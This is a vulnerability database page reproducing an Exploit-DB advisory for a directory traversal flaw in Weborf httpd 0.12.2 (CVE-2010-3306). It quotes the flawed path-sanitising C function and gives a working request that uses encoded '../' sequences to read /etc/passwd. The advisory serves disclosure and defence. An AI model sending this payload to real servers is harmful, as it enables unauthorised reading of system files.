Lucene search
+L

weborf 0.12.2 - Directory Traversal

🗓️ 07 Sep 2010 00:00:00Reported by RewType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Weborf httpd 0.12.2 Directory Traversal Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-3306
7 Sep 201000:00
circl
cve
CVE
CVE-2010-3306
24 Sep 201018:00
cve
cvelist
Cvelist
CVE-2010-3306
24 Sep 201018:00
cvelist
debiancve
Debian CVE
CVE-2010-3306
24 Sep 201018:00
debiancve
euvd
EUVD
EUVD-2010-3304
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-3306
24 Sep 201019:00
nvd
osv
OSV
DEBIAN-CVE-2010-3306
24 Sep 201019:00
osv
prion
Prion
Directory traversal
24 Sep 201019:00
prion
redhatcve
RedhatCVE
CVE-2010-3306
22 May 202503:14
redhatcve
ubuntucve
UbuntuCve
CVE-2010-3306
24 Sep 201019:00
ubuntucve
Rows per page
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author:	Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
    //Prevents the use of .. to access the whole filesystem  <-- ORLY?
    strReplace(url,"../",'\0');

    replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Out

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Sep 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.08559
35